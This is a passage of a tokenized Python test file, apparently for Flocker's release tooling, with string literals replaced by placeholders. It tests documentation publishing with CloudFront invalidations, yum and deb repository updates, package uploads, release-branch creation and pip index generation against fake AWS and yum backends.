CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_devel_removed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_devel_previous_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_production ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_production_gets_tagged_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( routing_rules = { } , s3_buckets = { } ) <EOL> self . assertRaises ( <EOL> NotTagged , <EOL> self . publish_docs , <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION ) <EOL> def test_production_can_publish_doc_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> self . publish_docs ( <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , environment = Environments . PRODUCTION ) <EOL> def test_production_can_publish_prerelease ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> self . publish_docs ( <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , environment = Environments . PRODUCTION ) <EOL> def test_publish_non_release_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( routing_rules = { } , s3_buckets = { } ) <EOL> self . assertRaises ( <EOL> NotARelease , <EOL> self . publish_docs , <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> def assert_error_key_update ( self , doc_version , environment , should_update ) : <EOL> """<STR_LIT>""" <EOL> bucket_names = set ( ) <EOL> for e in Environments . iterconstants ( ) : <EOL> bucket_names . add ( <EOL> DOCUMENTATION_CONFIGURATIONS [ e ] . documentation_bucket <EOL> ) <EOL> empty_buckets = { bucket_name : { } for bucket_name in bucket_names } <EOL> empty_buckets [ '<STR_LIT>' ] = { } <EOL> empty_error_keys = { bucket_name : b'<STR_LIT>' for bucket_name in bucket_names } <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = empty_buckets , <EOL> error_key = empty_error_keys <EOL> ) <EOL> expected_error_path = '<STR_LIT>' . format ( doc_version ) <EOL> expected_updated_bucket = ( <EOL> DOCUMENTATION_CONFIGURATIONS [ environment ] . documentation_bucket <EOL> ) <EOL> expected_error_keys = aws . error_key . copy ( ) <EOL> if should_update : <EOL> expected_error_keys [ expected_updated_bucket ] = expected_error_path <EOL> self . publish_docs ( <EOL> aws , <EOL> flocker_version = doc_version , <EOL> doc_version = doc_version , <EOL> environment = environment <EOL> ) <EOL> self . assertEqual ( expected_error_keys , aws . error_key ) <EOL> def test_error_key_dev_staging ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> should_update = True <EOL> ) <EOL> def test_error_key_dev_production ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> should_update = False <EOL> ) <EOL> def test_error_key_pre_staging ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> should_update = True <EOL> ) <EOL> def test_error_key_pre_production ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> should_update = False <EOL> ) <EOL> def test_error_key_marketing_staging ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> should_update = True <EOL> ) <EOL> def test_error_key_marketing_production ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> should_update = True <EOL> ) <EOL> class UpdateRepoTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( UpdateRepoTests , self ) . setUp ( ) <EOL> self . target_bucket = '<STR_LIT>' <EOL> self . target_key = '<STR_LIT>' <EOL> self . package_directory = FilePath ( self . mktemp ( ) ) <EOL> self . packages = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def update_repo ( self , aws , yum , <EOL> package_directory , target_bucket , target_key , source_repo , <EOL> packages , flocker_version , distribution ) : <EOL> """<STR_LIT>""" <EOL> dispatchers = [ aws . get_dispatcher ( ) , yum . get_dispatcher ( ) , <EOL> base_dispatcher ] <EOL> sync_perform ( <EOL> ComposedDispatcher ( dispatchers ) , <EOL> update_repo ( <EOL> package_directory = package_directory , <EOL> target_bucket = target_bucket , <EOL> target_key = target_key , <EOL> source_repo = source_repo , <EOL> packages = packages , <EOL> flocker_version = flocker_version , <EOL> distribution = distribution , <EOL> ) <EOL> ) <EOL> def test_fake_rpm ( self ) : <EOL> """<STR_LIT>""" <EOL> existing_s3_keys = { <EOL> os . path . join ( self . target_key , '<STR_LIT>' ) : '<STR_LIT>' , <EOL> os . path . join ( self . target_key , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys = existing_s3_keys . copy ( ) <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : existing_s3_keys , <EOL> } , <EOL> ) <EOL> unspecified_package = '<STR_LIT>' <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> unspecified_package : '<STR_LIT>' , <EOL> } <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = FakeYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = create_fake_repository ( self , files = repo_contents ) , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = '<STR_LIT>' , version = '<STR_LIT>' ) , <EOL> ) <EOL> expected_packages = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys . update ( { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } ) <EOL> expected_keys . update ( { <EOL> os . path . join ( self . target_key , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' + '<STR_LIT:U+002C>' . join ( sorted ( expected_packages ) ) , <EOL> } ) <EOL> self . assertEqual ( <EOL> expected_keys , <EOL> aws . s3_buckets [ self . target_bucket ] ) <EOL> def test_fake_deb ( self ) : <EOL> """<STR_LIT>""" <EOL> existing_s3_keys = { <EOL> os . path . join ( self . target_key , '<STR_LIT>' ) : '<STR_LIT>' , <EOL> os . path . join ( self . target_key , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys = existing_s3_keys . copy ( ) <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : existing_s3_keys , <EOL> } , <EOL> ) <EOL> unspecified_package = '<STR_LIT>' <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> unspecified_package : '<STR_LIT>' , <EOL> } <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = FakeYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = create_fake_repository ( self , files = repo_contents ) , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = '<STR_LIT>' , version = '<STR_LIT>' ) , <EOL> ) <EOL> expected_packages = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' + '<STR_LIT:U+002C>' . join ( sorted ( expected_packages ) ) , <EOL> } ) <EOL> self . assertEqual ( <EOL> expected_keys , <EOL> aws . s3_buckets [ self . target_bucket ] ) <EOL> def test_package_not_available_exception ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> exception = self . assertRaises ( <EOL> HTTPError , <EOL> self . update_repo , <EOL> aws = aws , <EOL> yum = FakeYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = create_fake_repository ( <EOL> self , files = { } ) , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = "<STR_LIT>" , version = "<STR_LIT>" ) , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , exception . response . status_code ) <EOL> @ skipUnless ( which ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_real_yum_utils ( self ) : <EOL> """<STR_LIT>""" <EOL> source_repo = FilePath ( self . mktemp ( ) ) <EOL> source_repo . createDirectory ( ) <EOL> FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) . copyTo ( source_repo ) <EOL> repo_uri = '<STR_LIT>' + source_repo . path <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> class RealYum ( object ) : <EOL> def get_dispatcher ( self ) : <EOL> return yum_dispatcher <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = RealYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = repo_uri , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = '<STR_LIT>' , version = '<STR_LIT>' ) , <EOL> ) <EOL> expected_files = { <EOL> os . path . join ( self . target_key , file ) <EOL> for file in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> files_on_s3 = aws . s3_buckets [ self . target_bucket ] <EOL> repodata_path = os . path . join ( self . target_key , '<STR_LIT>' ) <EOL> for metadata_file in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] : <EOL> for key in files_on_s3 : <EOL> if ( key . endswith ( metadata_file ) and <EOL> key . startswith ( repodata_path ) ) : <EOL> expected_files . add ( <EOL> os . path . join ( <EOL> repodata_path , <EOL> sha256 ( files_on_s3 [ key ] ) . hexdigest ( ) + <EOL> '<STR_LIT:->' + metadata_file ) <EOL> ) <EOL> break <EOL> else : <EOL> expected_files . add ( <EOL> os . path . join ( <EOL> repodata_path , '<STR_LIT>' + metadata_file ) ) <EOL> self . assertEqual ( expected_files , set ( files_on_s3 . keys ( ) ) ) <EOL> @ skipUnless ( which ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_real_dpkg_utils ( self ) : <EOL> """<STR_LIT>""" <EOL> source_repo = FilePath ( self . mktemp ( ) ) <EOL> source_repo . createDirectory ( ) <EOL> FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) . copyTo ( source_repo ) <EOL> repo_uri = '<STR_LIT>' + source_repo . path <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> class RealYum ( object ) : <EOL> def get_dispatcher ( self ) : <EOL> return yum_dispatcher <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = RealYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = repo_uri , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = "<STR_LIT>" , version = "<STR_LIT>" ) , <EOL> ) <EOL> expected_files = { <EOL> os . path . join ( self . target_key , file ) <EOL> for file in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> files_on_s3 = aws . s3_buckets [ self . target_bucket ] <EOL> self . assertEqual ( expected_files , set ( files_on_s3 . keys ( ) ) ) <EOL> packages_gz = files_on_s3 [ os . path . join ( self . target_key , '<STR_LIT>' ) ] <EOL> with GzipFile ( fileobj = StringIO ( packages_gz ) , mode = "<STR_LIT:r>" ) as f : <EOL> packages_metadata = f . read ( ) <EOL> self . assertNotIn ( self . package_directory . path , packages_metadata ) <EOL> class UploadPackagesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def upload_packages ( self , aws , yum , <EOL> scratch_directory , target_bucket , version , <EOL> build_server , top_level ) : <EOL> """<STR_LIT>""" <EOL> dispatchers = [ aws . get_dispatcher ( ) , yum . get_dispatcher ( ) , <EOL> base_dispatcher ] <EOL> sync_perform ( <EOL> ComposedDispatcher ( dispatchers ) , <EOL> upload_packages ( <EOL> scratch_directory = scratch_directory , <EOL> target_bucket = target_bucket , <EOL> version = version , <EOL> build_server = build_server , <EOL> top_level = top_level , <EOL> ) , <EOL> ) <EOL> def setUp ( self ) : <EOL> super ( UploadPackagesTests , self ) . setUp ( ) <EOL> self . scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> self . scratch_directory . createDirectory ( ) <EOL> self . target_bucket = '<STR_LIT>' <EOL> self . aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> self . build_server = '<STR_LIT>' <EOL> @ skipIf ( True , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_repositories_created ( self ) : <EOL> """<STR_LIT>""" <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . upload_packages ( <EOL> aws = self . aws , <EOL> yum = FakeYum ( ) , <EOL> scratch_directory = self . scratch_directory , <EOL> target_bucket = self . target_bucket , <EOL> version = '<STR_LIT>' , <EOL> build_server = create_fake_repository ( self , files = repo_contents ) , <EOL> top_level = FLOCKER_PATH , <EOL> ) <EOL> expected_files = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } <EOL> files_on_s3 = self . aws . s3_buckets [ self . target_bucket ] . keys ( ) <EOL> self . assertEqual ( expected_files , set ( files_on_s3 ) ) <EOL> @ skipIf ( True , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_key_suffixes ( self ) : <EOL> """<STR_LIT>""" <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . upload_packages ( <EOL> aws = self . aws , <EOL> yum = FakeYum ( ) , <EOL> scratch_directory = self . scratch_directory , <EOL> target_bucket = self . target_bucket , <EOL> version = '<STR_LIT>' , <EOL> build_server = create_fake_repository ( self , files = repo_contents ) , <EOL> top_level = FLOCKER_PATH , <EOL> ) <EOL> files_on_s3 = self . aws . s3_buckets [ self . target_bucket ] . keys ( ) <EOL> self . assertEqual ( set ( ) , { f for f in files_on_s3 if '<STR_LIT>' in f } ) <EOL> def create_fake_repository ( test_case , files ) : <EOL> """<STR_LIT>""" <EOL> source_repo = FilePath ( test_case . mktemp ( ) ) <EOL> source_repo . createDirectory <EOL> for key in files : <EOL> new_file = source_repo . preauthChild ( key ) <EOL> if not new_file . parent ( ) . exists ( ) : <EOL> new_file . parent ( ) . makedirs ( ) <EOL> new_file . setContent ( files [ key ] ) <EOL> return '<STR_LIT>' + source_repo . path <EOL> class UploadPythonPackagesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( UploadPythonPackagesTests , self ) . setUp ( ) <EOL> self . target_bucket = '<STR_LIT>' <EOL> self . scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> self . top_level = FilePath ( self . mktemp ( ) ) <EOL> self . top_level . makedirs ( ) <EOL> self . aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } ) <EOL> def upload_python_packages ( self ) : <EOL> """<STR_LIT>""" <EOL> dispatchers = [ self . aws . get_dispatcher ( ) , base_dispatcher ] <EOL> with open ( os . devnull , "<STR_LIT:w>" ) as discard : <EOL> sync_perform ( <EOL> ComposedDispatcher ( dispatchers ) , <EOL> upload_python_packages ( <EOL> scratch_directory = self . scratch_directory , <EOL> target_bucket = self . target_bucket , <EOL> top_level = self . top_level , <EOL> output = discard , <EOL> error = discard , <EOL> ) <EOL> ) <EOL> @ skipUnless ( hard_linking_possible ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_distributions_uploaded ( self ) : <EOL> """<STR_LIT>""" <EOL> self . top_level . child ( '<STR_LIT>' ) . setContent ( <EOL> dedent ( """<STR_LIT>""" ) . format ( package_version = '<STR_LIT>' ) <EOL> ) <EOL> self . upload_python_packages ( ) <EOL> aws_keys = self . aws . s3_buckets [ self . target_bucket ] . keys ( ) <EOL> self . assertEqual ( <EOL> sorted ( aws_keys ) , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> class UploadOptionsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_must_be_release_version ( self ) : <EOL> """<STR_LIT>""" <EOL> options = UploadOptions ( ) <EOL> self . assertRaises ( <EOL> NotARelease , <EOL> options . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_documentation_release_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> options = UploadOptions ( ) <EOL> self . assertRaises ( <EOL> DocumentationRelease , <EOL> options . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class CreateReleaseBranchOptionsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_flocker_version_required ( self ) : <EOL> """<STR_LIT>""" <EOL> options = CreateReleaseBranchOptions ( ) <EOL> self . assertRaises ( <EOL> UsageError , <EOL> options . parseOptions , [ ] ) <EOL> def create_git_repository ( test_case , bare = False ) : <EOL> """<STR_LIT>""" <EOL> directory = FilePath ( test_case . mktemp ( ) ) <EOL> repository = Repo . init ( path = directory . path , bare = bare ) <EOL> if not bare : <EOL> directory . child ( '<STR_LIT>' ) . makedirs ( ) <EOL> directory . child ( '<STR_LIT>' ) . touch ( ) <EOL> repository . index . add ( [ '<STR_LIT>' ] ) <EOL> repository . index . commit ( '<STR_LIT>' ) <EOL> repository . create_head ( '<STR_LIT>' ) <EOL> return repository <EOL> class CreateReleaseBranchTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( CreateReleaseBranchTests , self ) . setUp ( ) <EOL> self . repo = create_git_repository ( test_case = self ) <EOL> def test_branch_exists_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> branch = self . repo . create_head ( '<STR_LIT>' ) <EOL> self . assertRaises ( <EOL> BranchExists , <EOL> create_release_branch , '<STR_LIT>' , base_branch = branch ) <EOL> def test_active_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> branch = self . repo . create_head ( '<STR_LIT>' ) <EOL> create_release_branch ( version = '<STR_LIT>' , base_branch = branch ) <EOL> self . assertEqual ( <EOL> self . repo . active_branch . name , <EOL> "<STR_LIT>" ) <EOL> def test_branch_created_from_base ( self ) : <EOL> """<STR_LIT>""" <EOL> master = self . repo . active_branch <EOL> branch = self . repo . create_head ( '<STR_LIT>' ) <EOL> branch . checkout ( ) <EOL> FilePath ( self . repo . working_dir ) . child ( '<STR_LIT>' ) . touch ( ) <EOL> self . repo . index . add ( [ '<STR_LIT>' ] ) <EOL> self . repo . index . commit ( '<STR_LIT>' ) <EOL> master . checkout ( ) <EOL> create_release_branch ( version = '<STR_LIT>' , base_branch = branch ) <EOL> self . assertIn ( ( u'<STR_LIT>' , <NUM_LIT:0> ) , self . repo . index . entries ) <EOL> class CreatePipIndexTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( CreatePipIndexTests , self ) . setUp ( ) <EOL> self . scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> self . scratch_directory . makedirs ( ) <EOL> def test_index_created ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> def test_index_not_included ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> def test_quoted_destination ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> def test_escaped_title ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> class UploadPipIndexTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_index_uploaded ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket = '<STR_LIT>' <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> bucket : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> scratch_directory . makedirs ( ) <EOL> sync_perform ( <EOL> ComposedDispatcher ( [ aws . get_dispatcher ( ) , base_dispatcher ] ) , <EOL> upload_pip_index ( <EOL> scratch_directory = scratch_directory , <EOL> target_bucket = bucket ) ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ bucket ] [ '<STR_LIT>' ] , <EOL> ( 